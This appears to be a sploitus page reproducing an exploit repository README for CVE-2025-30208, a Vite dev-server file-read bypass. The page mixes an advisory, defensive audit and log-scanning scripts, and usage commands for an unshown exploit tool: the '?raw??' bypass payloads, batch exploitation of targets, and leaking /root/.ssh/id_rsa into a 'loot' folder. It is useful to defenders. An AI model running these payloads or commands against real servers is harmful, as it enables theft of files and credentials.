## https://sploitus.com/exploit?id=61372CD4-3835-550C-85E6-2342B2803317
# CVE-2025-30208 Vite Arbitrary File Read vulnerability 🌌

Here's a detailed overview of **CVE‑2025‑30208**, a medium-severity arbitrary file‑read vulnerability in Vite’s dev server:

---

## 🛠️ What is it?

* Vite’s `@fs` module allows static file access in development mode with path allowances controlled by `server.fs.allow`.
* Versions **before** 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 contain a flaw: URLs crafted with trailing query markers like `?raw??` or `?import&raw??` can bypass access restrictions and expose arbitrary files (e.g., system or source files) ([nvd.nist.gov][1]).

---

## 🔍 Who's affected?

* Vite dev‑servers explicitly **exposed to the network**, enabled via `--host` or `server.host`.
* Vulnerable version ranges:

  * 4.5.0 – 4.5.9
  * 5.0.0 – 5.4.14
  * 6.0.0 – 6.2.2 (each 6.x minor line has its own fix release; see the patched versions below) ([nsfocusglobal.com][2]).

---

## ⚠️ Severity & Impact

* **CVSS 3.1 score: 5.3 (Medium 🟠)**: Network attack, no privileges, high confidentiality impact ([wiz.io][3]).
* Exploitability: straightforward via crafted HTTP requests against an exposed development server ([wiz.io][3]).
* Public PoC is available, including scripts demonstrating `/etc/passwd` leaks ([security.snyk.io][4]).

---

## 🛡️ Mitigation & Response

* **Upgrade Vite** to one of the patched versions:

  * **6.2.3**, **6.1.2**, **6.0.12**, **5.4.15**, or **4.5.10** ([nvd.nist.gov][1]).
* **Avoid exposing** dev servers to public networks; limit with `localhost` or firewall rules ([wiz.io][3]).
* Additional scanning tools (e.g., NSFocus EZ, Sangfor, Tenable) support detection ([nsfocusglobal.com][2]).
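A version audit for step one of the response, written as an added example (not code from this repository or from Vite): it reconstructs the affected ranges from the version lists above and the patched releases, and reads the installed version from `node_modules/vite/package.json`. Pre-release handling follows semver ordering and is an assumption, since the advisory lists final releases only.

```python
import json
import re

# Affected ranges reconstructed from the advisory: lower bound inclusive,
# upper bound exclusive (the patched release for that line).
AFFECTED_RANGES = [
    ((4, 5, 0), (4, 5, 10)),
    ((5, 0, 0), (5, 4, 15)),
    ((6, 0, 0), (6, 0, 12)),
    ((6, 1, 0), (6, 1, 2)),
    ((6, 2, 0), (6, 2, 3)),
]
VERSION_RE = re.compile(
    r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$"
)

def parse_version(text):
    """Parse 'major.minor.patch[-prerelease][+build]' into a comparable tuple.

    Semver orders a pre-release below its release (6.2.3-beta.1 < 6.2.3), so the
    tuple ends in 0 for pre-releases and 1 for final releases. Assumption: a
    pre-release of a patched version is treated as still affected (conservative).
    """
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a semver version: {text!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch), 0 if pre else 1)

def is_affected(version):
    """True when this Vite version falls inside one of the affected ranges."""
    v = parse_version(version)
    for low, high in AFFECTED_RANGES:
        # Range bounds are final releases, so they carry the release marker (1).
        if low + (1,) <= v < high + (1,):
            return True
    return False

def installed_vite_version(package_json_text):
    """Version field of node_modules/vite/package.json, i.e. the installed copy."""
    return json.loads(package_json_text)["version"]

def audit(package_json_text):
    """Return (version, affected) for one project's installed Vite."""
    version = installed_vite_version(package_json_text)
    return version, is_affected(version)

SAMPLE_PACKAGE_JSON = '{"name": "vite", "version": "6.2.1"}'  # constructed input

if __name__ == "__main__":
    print(audit(SAMPLE_PACKAGE_JSON))
```

Run it against the real `node_modules/vite/package.json` of each project (or each dev container) rather than against the range declared in `package.json`, since only the installed version matters.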

---

## ✅ Summary Table

| Aspect             | Details                                                    |
| ------------------ | ---------------------------------------------------------- |
| **Flaw**           | `@fs` path filter bypass via malformed query strings       |
| **Versions**       | <4.5.10, <5.4.15, <6.0.12, <6.1.2, <6.2.3                  |
| **Severity**       | Medium (CVSS 5.3), network exploit, confidentiality impact |
| **Exploitability** | Easy; PoC exists                                           |
| **Patched in**     | Vite 4.5.10, 5.4.15, 6.0.12, 6.1.2, 6.2.3                  |
| **Mitigation**     | Upgrade + avoid exposing dev server                        |

---

## 🔗 References & Sources

* NVD / GitHub Advisory (Mar 24 2025) ([nvd.nist.gov][1], [wiz.io][3], [security.snyk.io][4], [recordedfuture.com][5])
* Technical writeups: NSFocus, Sangfor, Snyk, Recorded Future

---

## ✅ Recommended Next Steps

1. **Audit your Vite versions** in development environments, especially any exposed externally.
2. **Upgrade** immediately to a fixed version.
3. **Restrict access** to development servers—bind to `localhost`, use VPNs or firewalls.
4. **Run security scans/tools** to detect CVE‑2025‑30208 in your infrastructure.
5. **Monitor your logs** for suspicious `/@fs/...?...?` requests.
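A log check for step five, added here as an example (not part of this repository or of Vite): it scans access-log lines for `/@fs/` requests whose query string carries a second `?` (the `?raw??` / `?import&raw??` shape described above) or that point at sensitive paths. It assumes a reverse proxy in front of the dev server writes Common Log Format lines, since Vite itself does not produce such a log by default; the sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: a reverse proxy or other front end logs requests in Common Log
# Format. The SAMPLE_LOG lines below are constructed, not captured traffic.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)
SENSITIVE = ("/etc/", "/root/", "/.ssh/", "/proc/", "/.env", "id_rsa", "/.git/")

def classify_target(target):
    """Reasons a request target looks like an @fs access-control bypass probe.

    Only /@fs/ targets are considered; an empty list means nothing notable.
    """
    reasons = []
    if not target.startswith("/@fs/"):
        return reasons
    path, _, query = target.partition("?")
    path = unquote(path)
    if "?" in query:
        # A second '?' inside the query (?raw??, ?import&raw??) is the malformed
        # shape in the advisory; legitimate Vite suffixes such as ?import have one.
        reasons.append("doubled-query-marker")
    if "/../" in path or path.endswith("/.."):
        reasons.append("dot-dot-segment")
    if any(marker in path.lower() for marker in SENSITIVE):
        reasons.append("sensitive-path")
    return reasons

def scan_log(lines):
    """Return (ip, target, reasons) for every log line that trips a heuristic."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_target(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits

SAMPLE_LOG = [  # constructed examples
    '203.0.113.7 - - [24/Mar/2025:10:00:01 +0000] "GET /@fs/etc/passwd?raw?? HTTP/1.1" 200 1311',
    '203.0.113.7 - - [24/Mar/2025:10:00:02 +0000] "GET /@fs/root/.ssh/id_rsa?import&raw?? HTTP/1.1" 403 56',
    '10.0.0.5 - - [24/Mar/2025:10:00:03 +0000] "GET /@fs/home/dev/shared/util.ts?import HTTP/1.1" 200 812',
    '10.0.0.5 - - [24/Mar/2025:10:00:04 +0000] "GET /src/main.ts HTTP/1.1" 200 400',
]

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target, reasons)
```

A 403 on such a request still deserves attention: it shows someone probing the server, and the same request against an unpatched version would have returned the file.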


[1]: https://nvd.nist.gov/vuln/detail/CVE-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Detail - NVD"
[2]: https://nsfocusglobal.com/vite-arbitrary-file-read-vulnerability-cve-2025-30208/?utm_source=chatgpt.com "Vite Arbitrary File Read vulnerability (CVE-2025-30208) - NSFocus"
[3]: https://www.wiz.io/vulnerability-database/cve/cve-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Impact, Exploitability, and Mitigation Steps | Wiz"
[4]: https://security.snyk.io/vuln/SNYK-JS-VITE-9512410?utm_source=chatgpt.com "Incorrect Authorization in vite | CVE-2025-30208 | Snyk"
[5]: https://www.recordedfuture.com/vulnerability-database/CVE-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Description, Impact and Technical Details"
## Examples:

1- Single target exploitation:
```
python3 cve-2025-30208.py -u example.com:5173
```
2- Single target with custom LFI path to leak the file we want:
```
python3 cve-2025-30208.py -u example.com:5173 -p '/root/.ssh/id_rsa'
```
3- Batch exploitation with multiple targets:
```
python3 cve-2025-30208.py -f targets.txt
```
4- Custom bypass query:
```
python3 cve-2025-30208.py -u example.com:5173 -b "?raw&url"
```
5- Using a proxy (e.g. Burp Suite):
```
python3 cve-2025-30208.py -u example.com:5173 --proxy http://127.0.0.1:8080
```
6- Custom output directory:
```
python3 cve-2025-30208.py -u example.com:5173 -o ./loot
```
7- Increase thread count in batch mode:
```
python3 cve-2025-30208.py -f targets.txt -t 50
```

## ⚠️ Disclaimer

This project is created for **educational and research purposes only**. The author is not responsible for any misuse of this tool or information provided herein.

Using this software against systems without explicit permission is **illegal** and strictly prohibited. Always ensure you have **written authorization** before performing any security testing.

By using this repository, you agree to comply with all applicable local, state, national, and international laws.